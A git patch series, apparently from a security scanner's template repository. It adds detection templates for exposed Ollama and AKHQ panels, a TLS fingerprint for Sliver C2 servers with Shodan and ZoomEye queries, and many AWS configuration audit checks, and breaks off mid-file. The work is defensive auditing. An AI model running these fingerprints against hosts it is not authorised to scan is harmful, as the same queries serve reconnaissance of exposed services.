http/exposed-panels/ollama-llm-panel.yaml diff --git a/http/exposed-panels/ollama-llm-panel.yaml b/http/exposed-panels/ollama-llm-panel.yaml new file mode 100644 index 0000000000..1e527207d1 --- /dev/null +++ b/http/exposed-panels/ollama-llm-panel.yaml @@ -0,0 +1,29 @@ +id: ollama-llm-panel +info: + name: Ollama LLM Panel - Detect + author: pbuff07 + severity: info + description: Ollama LLM Panel was detected + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + metadata: + max-request: 1 + zoomeye-query: app:"Ollama LLM" + tags: panel,Ollama,LLM + +requests: + - raw: + - | + GET / HTTP/1.0 + Host: {{Hostname}}:11434 + + matchers-condition: and + matchers: + - type: word + words: + - "Ollama is running" + + - type: status + status: + - 200 \ No newline at end of file From 75e399a8098a5efeb8b2bd80e33c79b9672b92fc Mon Sep 17 00:00:00 2001 From: pbuff07 Date: Thu, 11 Apr 2024 13:42:56 +0800 Subject: [PATCH 0036/1768] update format --- http/exposed-panels/ollama-llm-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/ollama-llm-panel.yaml b/http/exposed-panels/ollama-llm-panel.yaml index 1e527207d1..5ff4905f06 100644 --- a/http/exposed-panels/ollama-llm-panel.yaml +++ b/http/exposed-panels/ollama-llm-panel.yaml @@ -17,7 +17,7 @@ requests: - | GET / HTTP/1.0 Host: {{Hostname}}:11434 - + matchers-condition: and matchers: - type: word From fc124ef29769c7400c3ae5fc8c4eea325341f782 Mon Sep 17 00:00:00 2001 From: pbuff07 Date: Thu, 11 Apr 2024 14:09:30 +0800 Subject: [PATCH 0037/1768] update request method and port settings --- http/exposed-panels/ollama-llm-panel.yaml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/http/exposed-panels/ollama-llm-panel.yaml b/http/exposed-panels/ollama-llm-panel.yaml index 5ff4905f06..fc3d667057 100644 --- a/http/exposed-panels/ollama-llm-panel.yaml +++ b/http/exposed-panels/ollama-llm-panel.yaml @@ -12,11 +12,10 @@ info: zoomeye-query: app:"Ollama LLM" tags: panel,Ollama,LLM -requests: - - raw: - - | - GET / HTTP/1.0 - Host: {{Hostname}}:11434 +http: + - method: GET + path: + - "{{BaseURL}}:11434" matchers-condition: and matchers: From 42d7163c2b42f11c521529603ffb8a25987ba788 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 11 Apr 2024 17:18:08 +0530 Subject: [PATCH 0038/1768] Update akhq-panel.yaml --- http/exposed-panels/akhq-panel.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/akhq-panel.yaml b/http/exposed-panels/akhq-panel.yaml index e01571820d..601ae98921 100644 --- a/http/exposed-panels/akhq-panel.yaml +++ b/http/exposed-panels/akhq-panel.yaml @@ -11,7 +11,7 @@ info: max-request: 1 shodan-query: http.favicon.hash:855432563 fofa-query: body="AKHQ_PREFIX_UI" - tags: akhq,panel,login + tags: akhq,panel,login,detect http: - method: GET @@ -21,9 +21,11 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "AKHQ" - part: body + - "AKHQ_PREFIX_UI" + condition: or - type: status status: From 3abdffb50fa41622faaed6a6fb0d2f6dd6803be8 Mon Sep 17 00:00:00 2001 From: johnk3r Date: Thu, 11 Apr 2024 10:30:03 -0300 Subject: [PATCH 0039/1768] Create sliver-c2.yaml --- ssl/c2/sliver-c2.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 ssl/c2/sliver-c2.yaml diff --git a/ssl/c2/sliver-c2.yaml b/ssl/c2/sliver-c2.yaml new file mode 100644 index 0000000000..07bdef32fd --- /dev/null +++ b/ssl/c2/sliver-c2.yaml @@ -0,0 +1,33 @@ +id: sliver-c2 + +info: + name: Sliver C2 - Detect + author: johnk3r + severity: info + description: | + Sliver is a Command and Control (C2) system made for penetration testers, red teams, and advanced persistent threats. It generates implants (slivers) that can run on virtually every architecture out there, and securely manage these connections through a central server + reference: | + https://malpedia.caad.fkie.fraunhofer.de/details/win.sliver + metadata: + verified: "true" + max-request: 1 + shodan-query: ssl:"multiplayer" tag:c2 + tags: c2,ssl,ir,osint,malware,sliver +ssl: + - address: "{{Host}}:{{Port}}" + matchers-condition: and + matchers: + - type: word + part: issuer_cn + words: + - "operators" + + - type: word + part: subject_dn + words: + - "CN=multiplayer" + + extractors: + - type: json + json: + - " .issuer_cn" From 95df0d0b53fc3433aac31cdd1333889e6e000eb1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 11 Apr 2024 19:53:07 +0530 Subject: [PATCH 0040/1768] AWS Code Templates (#8915) * s3 bucket checks * fixed lint errors * IAM checks * added ec2 templates * rdp * fixed lint error * acm & cloudwatch templates * cloudtrail * vpc templates added * added aws profile * fixed lint * added aws-code-env * added iterate in flow * added scan profile + updated tags * Delete config/cloud/aws.yml * updated scan profile * syntax update * removed local digest * added comments --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> Co-authored-by: Sandeep Singh --- cloud/aws/acm/acm-cert-expired.yaml | 40 ++++++++++ cloud/aws/acm/acm-cert-renewal-30days.yaml | 56 ++++++++++++++ cloud/aws/acm/acm-cert-renewal-45days.yaml | 56 ++++++++++++++ cloud/aws/acm/acm-cert-validation.yaml | 55 ++++++++++++++ cloud/aws/acm/acm-wildcard-cert.yaml | 55 ++++++++++++++ cloud/aws/aws-code-env.yaml | 52 +++++++++++++ .../cloudtrail/cloudtrail-data-events.yaml | 55 ++++++++++++++ cloud/aws/cloudtrail/cloudtrail-disabled.yaml | 55 ++++++++++++++ cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml | 55 ++++++++++++++ .../cloudtrail-global-disabled.yaml | 55 ++++++++++++++ .../cloudtrail-integrated-cloudwatch.yaml | 55 ++++++++++++++ .../cloudtrail/cloudtrail-log-integrity.yaml | 55 ++++++++++++++ .../cloudtrail-logs-not-encrypted.yaml | 55 ++++++++++++++ .../aws/cloudtrail/cloudtrail-mfa-delete.yaml | 72 ++++++++++++++++++ .../cloudtrail/cloudtrail-mgmt-events.yaml | 56 ++++++++++++++ .../cloudtrail/cloudtrail-public-buckets.yaml | 55 ++++++++++++++ .../cloudtrail-s3-bucket-logging.yaml | 72 ++++++++++++++++++ .../s3-object-lock-not-enabled.yaml | 73 +++++++++++++++++++ cloud/aws/cloudwatch/cw-alarm-action-set.yaml | 55 ++++++++++++++ cloud/aws/cloudwatch/cw-alarms-actions.yaml | 55 ++++++++++++++ cloud/aws/ec2/ec2-imdsv2.yaml | 55 ++++++++++++++ cloud/aws/ec2/ec2-public-ip.yaml | 55 ++++++++++++++ cloud/aws/ec2/ec2-sg-egress-open.yaml | 56 ++++++++++++++ cloud/aws/ec2/ec2-sg-ingress.yaml | 56 ++++++++++++++ cloud/aws/ec2/ec2-unrestricted-cifs.yaml | 36 +++++++++ cloud/aws/ec2/ec2-unrestricted-dns.yaml | 36 +++++++++ cloud/aws/ec2/ec2-unrestricted-ftp.yaml | 36 +++++++++ cloud/aws/ec2/ec2-unrestricted-http.yaml | 36 +++++++++ cloud/aws/ec2/ec2-unrestricted-https.yaml | 36 +++++++++ cloud/aws/ec2/ec2-unrestricted-icmp.yaml | 37 ++++++++++ cloud/aws/ec2/ec2-unrestricted-memcached.yaml | 36 +++++++++ cloud/aws/ec2/ec2-unrestricted-mongodb.yaml | 38 ++++++++++ cloud/aws/ec2/ec2-unrestricted-mssql.yaml | 36 +++++++++ cloud/aws/ec2/ec2-unrestricted-mysql.yaml | 36 +++++++++ cloud/aws/ec2/ec2-unrestricted-netbios.yaml | 36 +++++++++ .../aws/ec2/ec2-unrestricted-opensearch.yaml | 36 +++++++++ cloud/aws/ec2/ec2-unrestricted-oracle.yaml | 36 +++++++++ cloud/aws/ec2/ec2-unrestricted-pgsql.yaml | 36 +++++++++ cloud/aws/ec2/ec2-unrestricted-rdp.yaml | 36 +++++++++ cloud/aws/ec2/ec2-unrestricted-redis.yaml | 36 +++++++++ cloud/aws/ec2/ec2-unrestricted-smtp.yaml | 36 +++++++++ cloud/aws/ec2/ec2-unrestricted-ssh.yaml | 36 +++++++++ cloud/aws/ec2/ec2-unrestricted-telnet.yaml | 36 +++++++++ cloud/aws/ec2/publicly-shared-ami.yaml | 55 ++++++++++++++ cloud/aws/ec2/unencrypted-aws-ami.yaml | 55 ++++++++++++++ cloud/aws/iam/iam-access-analyzer.yaml | 28 +++++++ cloud/aws/iam/iam-expired-ssl.yaml | 29 ++++++++ cloud/aws/iam/iam-full-admin-privileges.yaml | 51 +++++++++++++ cloud/aws/iam/iam-key-rotation-90days.yaml | 49 +++++++++++++ cloud/aws/iam/iam-mfa-enable.yaml | 48 ++++++++++++ cloud/aws/iam/iam-password-policy.yaml | 28 +++++++ cloud/aws/iam/iam-root-mfa.yaml | 28 +++++++ cloud/aws/iam/iam-ssh-keys-rotation.yaml | 49 +++++++++++++ cloud/aws/iam/iam-unapproved-policy.yaml | 37 ++++++++++ cloud/aws/iam/iam-user-password-change.yaml | 28 +++++++ cloud/aws/iam/ssl-cert-renewal.yaml | 29 ++++++++ cloud/aws/rds/aurora-copy-tags-snap.yaml | 55 ++++++++++++++ cloud/aws/rds/aurora-delete-protect.yaml | 55 ++++++++++++++ cloud/aws/rds/iam-db-auth.yaml | 55 ++++++++++++++ cloud/aws/rds/rds-backup-enable.yaml | 55 ++++++++++++++ cloud/aws/rds/rds-deletion-protection.yaml | 56 ++++++++++++++ cloud/aws/rds/rds-encryption-check.yaml | 55 ++++++++++++++ cloud/aws/rds/rds-event-notify.yaml | 35 +++++++++ cloud/aws/rds/rds-event-sub-enable.yaml | 35 +++++++++ cloud/aws/rds/rds-event-sub.yaml | 35 +++++++++ cloud/aws/rds/rds-gp-ssd-usage.yaml | 55 ++++++++++++++ cloud/aws/rds/rds-public-snapshot.yaml | 55 ++++++++++++++ cloud/aws/rds/rds-public-subnet.yaml | 73 +++++++++++++++++++ cloud/aws/rds/rds-ri-payment-fail.yaml | 55 ++++++++++++++ cloud/aws/rds/rds-snapshot-encryption.yaml | 55 ++++++++++++++ cloud/aws/s3/s3-access-logging.yaml | 48 ++++++++++++ cloud/aws/s3/s3-auth-fullcontrol.yaml | 48 ++++++++++++ cloud/aws/s3/s3-bucket-key.yaml | 48 ++++++++++++ .../s3/s3-bucket-policy-public-access.yaml | 56 ++++++++++++++ cloud/aws/s3/s3-mfa-delete-check.yaml | 48 ++++++++++++ cloud/aws/s3/s3-public-read-acp.yaml | 49 +++++++++++++ cloud/aws/s3/s3-public-read.yaml | 49 +++++++++++++ cloud/aws/s3/s3-public-write-acp.yaml | 48 ++++++++++++ cloud/aws/s3/s3-public-write.yaml | 48 ++++++++++++ cloud/aws/s3/s3-server-side-encryption.yaml | 48 ++++++++++++ cloud/aws/s3/s3-versioning.yaml | 49 +++++++++++++ cloud/aws/vpc/nacl-open-inbound.yaml | 62 ++++++++++++++++ cloud/aws/vpc/nacl-outbound-restrict.yaml | 62 ++++++++++++++++ cloud/aws/vpc/nat-gateway-usage.yaml | 55 ++++++++++++++ cloud/aws/vpc/unrestricted-admin-ports.yaml | 64 ++++++++++++++++ cloud/aws/vpc/vpc-endpoint-exposed.yaml | 62 ++++++++++++++++ cloud/aws/vpc/vpc-endpoints-not-deployed.yaml | 55 ++++++++++++++ cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml | 57 +++++++++++++++ cloud/aws/vpc/vpn-tunnel-down.yaml | 55 ++++++++++++++ cloud/enum/aws-app-enum.yaml | 1 + cloud/enum/azure-db-enum.yaml | 1 + cloud/enum/azure-vm-cloud-enum.yaml | 1 + cloud/enum/azure-website-enum.yaml | 1 + cloud/enum/gcp-app-engine-enum.yaml | 1 + cloud/enum/gcp-bucket-enum.yaml | 1 + cloud/enum/gcp-firebase-app-enum.yaml | 1 + cloud/enum/gcp-firebase-rtdb-enum.yaml | 1 + profiles/aws-cloud-config.yml | 9 +++ 98 files changed, 4317 insertions(+) create mode 100644 cloud/aws/acm/acm-cert-expired.yaml create mode 100644 cloud/aws/acm/acm-cert-renewal-30days.yaml create mode 100644 cloud/aws/acm/acm-cert-renewal-45days.yaml create mode 100644 cloud/aws/acm/acm-cert-validation.yaml create mode 100644 cloud/aws/acm/acm-wildcard-cert.yaml create mode 100644 cloud/aws/aws-code-env.yaml create mode 100644 cloud/aws/cloudtrail/cloudtrail-data-events.yaml create mode 100644 cloud/aws/cloudtrail/cloudtrail-disabled.yaml create mode 100644 cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml create mode 100644 cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml create mode 100644 cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml create mode 100644 cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml create mode 100644 cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml create mode 100644 cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml create mode 100644 cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml create mode 100644 cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml create mode 100644 cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml create mode 100644 cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml create mode 100644 cloud/aws/cloudwatch/cw-alarm-action-set.yaml create mode 100644 cloud/aws/cloudwatch/cw-alarms-actions.yaml create mode 100644 cloud/aws/ec2/ec2-imdsv2.yaml create mode 100644 cloud/aws/ec2/ec2-public-ip.yaml create mode 100644 cloud/aws/ec2/ec2-sg-egress-open.yaml create mode 100644 cloud/aws/ec2/ec2-sg-ingress.yaml create mode 100644 cloud/aws/ec2/ec2-unrestricted-cifs.yaml create mode 100644 cloud/aws/ec2/ec2-unrestricted-dns.yaml create mode 100644 cloud/aws/ec2/ec2-unrestricted-ftp.yaml create mode 100644 cloud/aws/ec2/ec2-unrestricted-http.yaml create mode 100644 cloud/aws/ec2/ec2-unrestricted-https.yaml create mode 100644 cloud/aws/ec2/ec2-unrestricted-icmp.yaml create mode 100644 cloud/aws/ec2/ec2-unrestricted-memcached.yaml create mode 100644 cloud/aws/ec2/ec2-unrestricted-mongodb.yaml create mode 100644 cloud/aws/ec2/ec2-unrestricted-mssql.yaml create mode 100644 cloud/aws/ec2/ec2-unrestricted-mysql.yaml create mode 100644 cloud/aws/ec2/ec2-unrestricted-netbios.yaml create mode 100644 cloud/aws/ec2/ec2-unrestricted-opensearch.yaml create mode 100644 cloud/aws/ec2/ec2-unrestricted-oracle.yaml create mode 100644 cloud/aws/ec2/ec2-unrestricted-pgsql.yaml create mode 100644 cloud/aws/ec2/ec2-unrestricted-rdp.yaml create mode 100644 cloud/aws/ec2/ec2-unrestricted-redis.yaml create mode 100644 cloud/aws/ec2/ec2-unrestricted-smtp.yaml create mode 100644 cloud/aws/ec2/ec2-unrestricted-ssh.yaml create mode 100644 cloud/aws/ec2/ec2-unrestricted-telnet.yaml create mode 100644 cloud/aws/ec2/publicly-shared-ami.yaml create mode 100644 cloud/aws/ec2/unencrypted-aws-ami.yaml create mode 100644 cloud/aws/iam/iam-access-analyzer.yaml create mode 100644 cloud/aws/iam/iam-expired-ssl.yaml create mode 100644 cloud/aws/iam/iam-full-admin-privileges.yaml create mode 100644 cloud/aws/iam/iam-key-rotation-90days.yaml create mode 100644 cloud/aws/iam/iam-mfa-enable.yaml create mode 100644 cloud/aws/iam/iam-password-policy.yaml create mode 100644 cloud/aws/iam/iam-root-mfa.yaml create mode 100644 cloud/aws/iam/iam-ssh-keys-rotation.yaml create mode 100644 cloud/aws/iam/iam-unapproved-policy.yaml create mode 100644 cloud/aws/iam/iam-user-password-change.yaml create mode 100644 cloud/aws/iam/ssl-cert-renewal.yaml create mode 100644 cloud/aws/rds/aurora-copy-tags-snap.yaml create mode 100644 cloud/aws/rds/aurora-delete-protect.yaml create mode 100644 cloud/aws/rds/iam-db-auth.yaml create mode 100644 cloud/aws/rds/rds-backup-enable.yaml create mode 100644 cloud/aws/rds/rds-deletion-protection.yaml create mode 100644 cloud/aws/rds/rds-encryption-check.yaml create mode 100644 cloud/aws/rds/rds-event-notify.yaml create mode 100644 cloud/aws/rds/rds-event-sub-enable.yaml create mode 100644 cloud/aws/rds/rds-event-sub.yaml create mode 100644 cloud/aws/rds/rds-gp-ssd-usage.yaml create mode 100644 cloud/aws/rds/rds-public-snapshot.yaml create mode 100644 cloud/aws/rds/rds-public-subnet.yaml create mode 100644 cloud/aws/rds/rds-ri-payment-fail.yaml create mode 100644 cloud/aws/rds/rds-snapshot-encryption.yaml create mode 100644 cloud/aws/s3/s3-access-logging.yaml create mode 100644 cloud/aws/s3/s3-auth-fullcontrol.yaml create mode 100644 cloud/aws/s3/s3-bucket-key.yaml create mode 100644 cloud/aws/s3/s3-bucket-policy-public-access.yaml create mode 100644 cloud/aws/s3/s3-mfa-delete-check.yaml create mode 100644 cloud/aws/s3/s3-public-read-acp.yaml create mode 100644 cloud/aws/s3/s3-public-read.yaml create mode 100644 cloud/aws/s3/s3-public-write-acp.yaml create mode 100644 cloud/aws/s3/s3-public-write.yaml create mode 100644 cloud/aws/s3/s3-server-side-encryption.yaml create mode 100644 cloud/aws/s3/s3-versioning.yaml create mode 100644 cloud/aws/vpc/nacl-open-inbound.yaml create mode 100644 cloud/aws/vpc/nacl-outbound-restrict.yaml create mode 100644 cloud/aws/vpc/nat-gateway-usage.yaml create mode 100644 cloud/aws/vpc/unrestricted-admin-ports.yaml create mode 100644 cloud/aws/vpc/vpc-endpoint-exposed.yaml create mode 100644 cloud/aws/vpc/vpc-endpoints-not-deployed.yaml create mode 100644 cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml create mode 100644 cloud/aws/vpc/vpn-tunnel-down.yaml create mode 100644 profiles/aws-cloud-config.yml diff --git a/cloud/aws/acm/acm-cert-expired.yaml b/cloud/aws/acm/acm-cert-expired.yaml new file mode 100644 index 0000000000..734e12a553 --- /dev/null +++ b/cloud/aws/acm/acm-cert-expired.yaml @@ -0,0 +1,40 @@ +id: acm-cert-expired +info: + name: Expired ACM Certificates + author: princechaddha + severity: high + description: | + Ensure removal of expired SSL/TLS certificates in AWS Certificate Manager to comply with Amazon Security Best Practices. + impact: | + Expired certificates can lead to service interruptions and expose applications to man-in-the-middle attacks. + remediation: | + Regularly review ACM for expired certificates and delete them or replace with updated versions. + reference: + - https://docs.aws.amazon.com/acm/latest/userguide/acm-certificate.html + tags: cloud,devops,aws,amazon,acm,aws-cloud-config + +variables: + region: "us-east-1" + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws acm list-certificates --region $region --certificate-statuses EXPIRED + + matchers: + - type: word + words: + - 'CertificateArn' + + extractors: + - type: json + name: certificatearn + json: + - '.CertificateSummaryList[] | .CertificateArn' + + - type: dsl + dsl: + - 'region + " AWS region have expired SSL/TLS certificates"' diff --git a/cloud/aws/acm/acm-cert-renewal-30days.yaml b/cloud/aws/acm/acm-cert-renewal-30days.yaml new file mode 100644 index 0000000000..3b02e989f3 --- /dev/null +++ b/cloud/aws/acm/acm-cert-renewal-30days.yaml @@ -0,0 +1,56 @@ +id: acm-cert-renewal-30days +info: + name: ACM Certificates Pre-expiration Renewal + author: princechaddha + severity: medium + description: | + Ensure AWS ACM SSL/TLS certificates are renewed at least 30 days before expiration to prevent service disruptions. + impact: | + Failure to renew certificates timely may lead to expired certificates causing service access issues or downtimes. + remediation: | + Set up Amazon CloudWatch to monitor ACM certificate expiration and automate renewal notifications or processes. + reference: + - https://docs.aws.amazon.com/acm/latest/userguide/acm-renewal.html + tags: cloud,devops,aws,amazon,acm,aws-cloud-config + +variables: + region: "us-east-1" + +flow: | + code(1) + for(let arns of iterate(template.certificatearns)){ + set("certificatearn", arns) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws acm list-certificates --region $region --certificate-statuses ISSUED --query 'CertificateSummaryList[*].CertificateArn' --output json + + extractors: + - type: json + name: certificatearns + internal: true + json: + - '.CertificateSummaryList[] | .CertificateArn' + + - engine: + - sh + - bash + source: | + aws acm describe-certificate --region $region --certificate-arn $certificatearn --query 'Certificate.[NotAfter, CertificateArn]' --output json | jq -r 'select((.[0] | fromdateiso8601 | mktime) - (now | mktime) < (30 * 86400)) | .[1]' + + extractors: + - type: regex # type of the extractor + name: certificate + internal: true + regex: + - '^arn.*' + + - type: dsl + dsl: + - '"The AWS ACM Certificate " + certificate +" is about to expire in 30 days"' diff --git a/cloud/aws/acm/acm-cert-renewal-45days.yaml b/cloud/aws/acm/acm-cert-renewal-45days.yaml new file mode 100644 index 0000000000..383b5c9cc3 --- /dev/null +++ b/cloud/aws/acm/acm-cert-renewal-45days.yaml @@ -0,0 +1,56 @@ +id: acm-cert-renewal-45days +info: + name: ACM Certificates Pre-expiration Renewal + author: princechaddha + severity: medium + description: | + Ensure AWS ACM SSL/TLS certificates are renewed at least 45 days before expiration to prevent service disruptions. + impact: | + Failure to renew certificates timely may lead to expired certificates causing service access issues or downtimes. + remediation: | + Set up Amazon CloudWatch to monitor ACM certificate expiration and automate renewal notifications or processes. + reference: + - https://docs.aws.amazon.com/acm/latest/userguide/acm-renewal.html + tags: cloud,devops,aws,amazon,acm,aws-cloud-config + +variables: + region: "us-east-1" + +flow: | + code(1) + for(let arns of iterate(template.certificatearns)){ + set("certificatearn", arns) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws acm list-certificates --region $region --certificate-statuses ISSUED --query 'CertificateSummaryList[*].CertificateArn' --output json + + extractors: + - type: json + name: certificatearns + internal: true + json: + - '.CertificateSummaryList[] | .CertificateArn' + + - engine: + - sh + - bash + source: | + aws acm describe-certificate --region $region --certificate-arn $certificatearn --query 'Certificate.[NotAfter, CertificateArn]' --output json | jq -r 'select((.[0] | fromdateiso8601 | mktime) - (now | mktime) < (45 * 86400)) | .[1]' + + extractors: + - type: regex # type of the extractor + name: certificate + internal: true + regex: + - '^arn.*' + + - type: dsl + dsl: + - '"The AWS ACM Certificate " + certificate +" is about to expire in 30 days"' diff --git a/cloud/aws/acm/acm-cert-validation.yaml b/cloud/aws/acm/acm-cert-validation.yaml new file mode 100644 index 0000000000..f9f60579b3 --- /dev/null +++ b/cloud/aws/acm/acm-cert-validation.yaml @@ -0,0 +1,55 @@ +id: acm-cert-validation +info: + name: ACM Certificate Validation Check + author: princechaddha + severity: medium + description: | + Ensure ACM SSL/TLS certificates are properly validated during issue or renewal, indicating secure communication channels. + impact: | + Lack of validation may allow unauthorized certificates, leading to potential man-in-the-middle attacks or data breaches. + remediation: | + Use AWS ACM for certificate provisioning and ensure domain validation steps are correctly followed for each certificate issued or renewed. + reference: + - https://docs.aws.amazon.com/acm/latest/userguide/gs-acm-validate.html + tags: cloud,devops,aws,amazon,acm,aws-cloud-config + +variables: + region: "us-east-1" + +flow: | + code(1) + for(let arns of iterate(template.certificatearns)){ + set("certificatearn", arns) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws acm list-certificates --region $region --output json + + extractors: + - type: json + name: certificatearns + internal: true + json: + - '.CertificateSummaryList[] | .CertificateArn' + + - engine: + - sh + - bash + source: | + aws acm describe-certificate --region $region --certificate-arn $certificatearn --query 'Certificate.Status' + + matchers: + - type: word + words: + - "PENDING_VALIDATION" + + extractors: + - type: dsl + dsl: + - '"The issue/renewal request for " + certificatearn + " SSL/TLS certificate was not validated"' diff --git a/cloud/aws/acm/acm-wildcard-cert.yaml b/cloud/aws/acm/acm-wildcard-cert.yaml new file mode 100644 index 0000000000..0b7aaa37cc --- /dev/null +++ b/cloud/aws/acm/acm-wildcard-cert.yaml @@ -0,0 +1,55 @@ +id: acm-wildcard-cert +info: + name: Wildcard ACM Certificate Usage + author: princechaddha + severity: low + description: | + Ensure ACM certificates for specific domain names are used over wildcard certificates to adhere to best security practices, providing unique private keys for each domain/subdomain. + impact: | + Using wildcard certificates can expose your AWS environment to increased risk by potentially allowing unauthorized subdomains to be protected under the same certificate, reducing the granularity of access control and increasing the blast radius in the event of a key compromise. + remediation: | + Replace wildcard ACM certificates with single domain name certificates for each domain/subdomain within your AWS account. This enhances security by ensuring each domain/subdomain has its own unique private key and certificate. + reference: + - https://docs.aws.amazon.com/acm/latest/userguide/acm-certificate.html + tags: cloud,devops,aws,amazon,acm,aws-cloud-config + +variables: + region: "us-east-1" + +flow: | + code(1) + for(let arns of iterate(template.certificatearns)){ + set("certificatearn", arns) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws acm list-certificates --region $region --certificate-statuses ISSUED --query 'CertificateSummaryList[*].CertificateArn' --output json + + extractors: + - type: json + name: certificatearns + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws acm describe-certificate --region $region --certificate-arn $certificatearn --query 'Certificate.DomainName' + + matchers: + - type: word + words: + - "*." + + extractors: + - type: dsl + dsl: + - 'certificatearn + " AWS ACM certificate is a wildcard certificate"' diff --git a/cloud/aws/aws-code-env.yaml b/cloud/aws/aws-code-env.yaml new file mode 100644 index 0000000000..2d7cddc180 --- /dev/null +++ b/cloud/aws/aws-code-env.yaml @@ -0,0 +1,52 @@ +id: aws-code-env +info: + name: AWS Cloud Environment Validation + author: princechaddha + severity: info + description: | + Checks if AWS CLI is set up and all necessary tools are installed on the environment. + reference: + - https://aws.amazon.com/cli/ + tags: cloud,devops,aws,amazone,aws-cloud-config + +variables: + region: "us-east-1" + +flow: code(1) && code(2) + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws sts get-caller-identity --output json + + matchers: + - type: word + internal: true + words: + - '"UserId"' + + extractors: + - type: json + name: account + internal: true + json: + - '.Account' + + - engine: + - sh + - bash + source: | + jq --version >/dev/null 2>&1 && echo "jq is installed." || echo "jq is not installed." + + matchers: + - type: word + words: + - "jq is installed" + + extractors: + - type: dsl + dsl: + - '"AWS CLI is properly configured for account \"" + account + "\" and all the necessary tools required are installed"' diff --git a/cloud/aws/cloudtrail/cloudtrail-data-events.yaml b/cloud/aws/cloudtrail/cloudtrail-data-events.yaml new file mode 100644 index 0000000000..8235790afb --- /dev/null +++ b/cloud/aws/cloudtrail/cloudtrail-data-events.yaml @@ -0,0 +1,55 @@ +id: cloudtrail-data-events +info: + name: CloudTrail S3 Data Events Logging + author: princechaddha + severity: low + description: | + Ensure Amazon CloudTrail trails log S3 data events to monitor object-level operations like GetObject, DeleteObject, and PutObject. + impact: | + Without logging S3 data events, you lose visibility into object-level operations which could help detect unauthorized access or modifications. + remediation: | + Enable data event logging in CloudTrail for S3 buckets to ensure detailed activity monitoring and logging for better security and compliance. + reference: + - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/logging-data-events-with-cloudtrail.html + tags: cloud,devops,aws,amazon,s3,cloudtrail,aws-cloud-config + +variables: + region: "ap-south-1" + +flow: | + code(1) + for(let CloudTrail of iterate(template.cloudtrailname)){ + set("trail", CloudTrail) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws cloudtrail list-trails --region $region --query 'Trails[*].Name' --output json + + extractors: + - type: json + name: cloudtrailname + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws cloudtrail get-event-selectors --region $region --trail-name $trail --query 'EventSelectors[*].DataResources[]' + + matchers: + - type: word + words: + - "[]" + + extractors: + - type: dsl + dsl: + - '"CloudTrail trail" + trail + " is not configured to capture resource operations performed on or within an AWS cloud resource"' diff --git a/cloud/aws/cloudtrail/cloudtrail-disabled.yaml b/cloud/aws/cloudtrail/cloudtrail-disabled.yaml new file mode 100644 index 0000000000..02d390ce8f --- /dev/null +++ b/cloud/aws/cloudtrail/cloudtrail-disabled.yaml @@ -0,0 +1,55 @@ +id: cloudtrail-disabled +info: + name: CloudTrail Disabled + author: princechaddha + severity: high + description: | + Ensures AWS CloudTrail is enabled in all regions to monitor and record account activity across your AWS infrastructure, enhancing security and compliance. + impact: | + Lack of region-wide CloudTrail logging can lead to insufficient visibility into account activities, hindering anomaly detection and forensic analysis. + remediation: | + Enable CloudTrail in all AWS regions through the AWS Management Console or CLI to ensure comprehensive activity logging and monitoring. + reference: + - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-getting-started.html + tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config + +variables: + region: "ap-south-1" + +flow: | + code(1) + for(let CloudTrail of iterate(template.cloudtrailname)){ + set("trail", CloudTrail) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws cloudtrail list-trails --region $region --query 'Trails[*].Name' --output json + + extractors: + - type: json + name: cloudtrailname + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws cloudtrail describe-trails --region $region --trail-name-list $trail --query 'trailList[*].IsMultiRegionTrail' + + matchers: + - type: word + words: + - "false" + + extractors: + - type: dsl + dsl: + - '"CloudTrail trail" + trail + " is not configured to receive log files from all the AWS cloud regions"' diff --git a/cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml b/cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml new file mode 100644 index 0000000000..a95dc037ce --- /dev/null +++ b/cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml @@ -0,0 +1,55 @@ +id: cloudtrail-dup-logs +info: + name: CloudTrail Duplicate Log Avoidance + author: princechaddha + severity: medium + description: | + Ensure CloudTrail logging is configured to prevent duplicate recording of global service events across multiple trails. + impact: | + Duplicate log entries can lead to increased storage costs and complicate log analysis and anomaly detection efforts. + remediation: | + Configure only one multi-region trail to log global service events and disable global service logging for all other trails. + reference: + - 